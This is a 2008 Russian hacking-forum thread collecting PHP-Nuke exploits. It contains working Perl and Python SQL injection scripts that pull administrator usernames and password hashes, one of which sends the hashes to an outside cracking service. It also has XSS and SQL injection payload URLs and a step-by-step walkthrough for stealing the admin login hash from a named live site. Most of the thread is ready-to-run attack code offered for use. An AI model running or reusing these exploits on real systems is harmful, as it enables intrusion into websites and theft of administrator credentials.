Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
XSS in PHP-Nuke (eWeather module) |
14.03.2008, 23:02
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
XSS in PHP-Nuke (eWeather module)
XSS
Vulnerable: eWeather module
Уязвимый код: в скрипте /modules/eWeather/index.php
PHP код:
Строка 35: $zipCode=$chart;
Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
Переменная "chart" не фильтруется.
PoC:
Код:
http://example.net/modules.php?name=eWeather&chart=[XSS]
Fix:
Строку 35 заменить на: "$zipCode=(int)$chart;"
by: NetJackal
Последний раз редактировалось iddqd; 14.03.2008 в 23:12..
|
|
|
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection |
23.03.2008, 13:02
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection
SQL Injection
Vulnerable: PHP-Nuke Platinum 7.6.b.5
Vuln script: dynamic_titles.php
Exploit:
Код:
#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table = "nuke_users";
$uid = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");
$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
$url = shift;
$reg = shift;
$ua = LWP::UserAgent->new;
$urls = $url;
$response = $ua->get($urls);
$content = $response->content;
if ($content=~m/$reg/) {
($f,$s,$l) = split(">>",$1);
$s =~s/ Post //;
print $column.":".$s."\n";
}
}
© Inphex
|
|
|
|
PHP-Nuke version 8.1 CAPTCHA bypass |
27.04.2008, 04:57
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
PHP-Nuke version 8.1 CAPTCHA bypass
Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy.
http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip
|
|
|
|
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability |
19.05.2008, 19:02
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
Код:
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/
not: password and username in title! colomb number 1
not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma.
işe yarar bug nasıl hit yapıyor görmek istiyorsanız
http://www.milw0rm.com/author/721
sadece bi bug 16000+ hit sadece milw0rm;)
Herzmn kral benimdir!
-------------------------------------------------------------------------------
|
|
|
|
23.05.2008, 23:39
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
PHP-Nuke GaestebuchSQL Injection Exploit
Код:
#!/usr/bin/python
# PHP-Nuke Gaestebuch Module SQL Injection Exploit
# Coded By Shahin Ramezany For Fun
# E-Mail : Admin@secuiran.com
import string
import urllib
import sys
import re
def Secuiran():
print "\n"
print "#####################################################"
print "# WwW.Secuiran.Com #"
print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit #"
print "# Coded By Shahin . Ramezany (Vampire) For Fun #"
print "# Keep It Priv8 && Never Post In Public Forum's #"
print "# E-Mail : Admin@Secuiran.com #"
print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix #"
print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's #"
print "#####################################################"
print "\n"
#Call Banner
Secuiran()
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"
try:
host=raw_input("\nTarget Host (with http) : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Output File: e.e: secuiran.txt"
try:
secuiran=raw_input("\nOutput File: ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Trying To Connect ...\n"
#SQL Injection URL
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall
found_users=findall_users(response)
#check found user length
if len(found_users)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
#Extract Admin Hash
response = urllib.urlopen(sql_inject).read()
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
#Crack The Hash
md5 = string.join( found_hashs, '' )
print "[+] Trying To Crack The Hash ..."
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5
result = urllib.urlopen(crack).read()
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall
if re.match(result,"MD5_1_result,"+md5+" - not found"):
print "[-] Can Not Crack"
#sys.exit()
found=cracked(result)
#Convert List To String
cracked_md5 = string.join( found, '' )
#Print All Info
Secuiran()
print "\n[+] Host : ",host
for i in range(len(found_users)):
print "\n[+] Admin User : ",found_users[i]
print "\n[+] Admin Hash : ",found_hashs[i]
if (cracked_md5 == "not"):
print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"
else:
print "\n[+] Hash Cracked Successfully : ",cracked_md5
#Save All Info In File
file = open(secuiran, "w")
file.write("**************************************************WwW.Secuiran.Com**************************************************\n")
file.write("\n")
file.write("HOST :")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write(" ")
file.write("\n")
for i in range(len(found_users)):
file.write(found_users[i])
file.write(" ")
file.write(found_hashs[i])
file.write("\n")
file.write("\n")
if (cracked_md5 == "not"):
file.write("\n")
file.write("I Can't Crack Your Hash")
else:
file.write("Cracked :")
file.write(" ")
file.write("\n")
file.write(cracked_md5)
file.write("\n")
file.write("**************************************************WwW.Secuiran.Com**************************************************\n")
file.close()
print "\n[+] Successfully, Writed To ",secuiran," File ."
|
|
|
|
14.07.2008, 06:12
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350
Репутация:
412
|
|
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab
Код:
#!/usr/bin/python
#===============================================================================
==================#
# This is a Priv8 Exploit. #
# Date: 23/02/2008 [dd,mm,yyyy] #
# #
#===============================================================================
==================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 #
# Response Analisys Method #
# #
# Vendor: http://www.phpnuke.org #
# Severity: Highest #
# Author: The:Paradox #
#===============================================================================
==================#
# Server configuration requirments: #
# magic_quotes_gpc = 0 #
#===============================================================================
==================#
# Proud To Be Italian. #
#===============================================================================
==================#
"""
Related Codes:
mainfile.php; line 89;
if (!ini_get('register_globals')) {
@import_request_variables("GPC", "");
}
/Your_Account/index.php; line 1700;
switch($op) {
// [..]
case "activate":
activate($username, $check_num);
break;
// [..]
}
/Your_Account/index.php; line 161:
function activate($username, $check_num) {
global $db, $user_prefix, $module_name, $language, $prefix;
$username = filter($username, "nohtml", 1);
$past = time()-86400;
$db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
$sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
echo $sql;
$result = $db->sql_query($sql);
"""
#===============================================================================
==================#
# Proof Of Concept / Bug Explanation: #
# #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable. #
# Byte null bypasses all query string check. #
# #
#===============================================================================
==================#
# Google Dork=> Powered by PHPNuke #
#===============================================================================
==================#
# Use this at your own risk. You are responsible for your own deeds. #
#===============================================================================
==================#
# Python Exploit Starts #
#===============================================================================
==================#
import httplib, sys, time
print "\n#=========================================================#"
print " PHPNuke <= 8.0 And Maybe Higher "
print " Blind Sql Injection Vulnerability Mq=0 "
print " Response Analisys Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0])
print " python %s www.host.com / Andrea " % (sys.argv[0])
print " "
print " "
print "#=========================================================#\n"
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."
target = sys.argv[1]
path = sys.argv[2]
prefix = "nuke_"
port = "80"
j=1
h4sh = ""
md5tuple = []
for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')
# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#
print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
for i in md5tuple:
if i == 'END': sys.exit('[-]Exploit Failed.\n')
conn = httplib.HTTPConnection(target,port)
conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
response = conn.getresponse()
time.sleep(0.5)
if response.status == 404: sys.exit('[-]Error 404. Not Found.')
if response.read().find("New user verification number is invalid.") != -1:
sys.stdout.write(chr(i))
sys.stdout.flush()
h4sh += chr(i)
j += 1
break;
print "\n\n[+]All Done.\n-=Paradoxe=-"
|
|
|
|
19.07.2008, 21:06
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Ковырял я когда то PHP Nuke 8.0. Вот парачка багов:
[XSS]
http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00 "><script>alert()</script>
[XSS]
http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>
[SQL-Inj] (POC)
http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
__________________
Кто я?..
|
|
|
|
28.07.2008, 01:45
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350
Репутация:
412
|
|
|
|
|
|
04.08.2008, 22:07
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
XSS:
POST-запрос на странице http://site/modules.php?name=Your_Account &op=new_user
Код:
"><script src=http://site/script.js>
В полях: gfx_check та random_num.
|
|
|
|
31.08.2008, 02:14
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян
Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код
Exploit:
Для примера возьму сайт sat-port.info
Регистрируемся, редактируем наш аккаунт:
Код:
http://sat-port.info/modules.php?name=Your_Account&op=edituser
в поле Любой Email пишем:
Код:
admin@admin.ru',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*
Берем любую новость где разрешено оставлять комментарии, к примеру эту:
Код:
http://sat-port.info/modules.php?name=News&file=article&sid=554
жмем "Комментировать" и пишем комментарий любого содержания, в результате появиться комментарий содержащий логин:хэш администратора
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 31.08.2008 в 22:32..
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP, PERL, MySQL, JavaScript |
186 |
21.02.2010 02:41 |
|
BookS: PHP, PERL, MySQL, JavaScript, HTML, ajax, Веб Дизайн
|
M1nK0 |
PHP, PERL, MySQL, JavaScript |
10 |
27.06.2009 21:35 |
|
Что такое Php?
|
PAPA212 |
Болталка |
13 |
28.12.2007 20:44 |
|
Безопасность в Php, Часть Iii
|
k00p3r |
Чужие Статьи |
0 |
11.07.2005 19:02 |
|
Защищаем Php. Шаг за шагом.
|
k00p3r |
Чужие Статьи |
0 |
13.06.2005 11:31 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
о регенат тут 
Комбинированный вид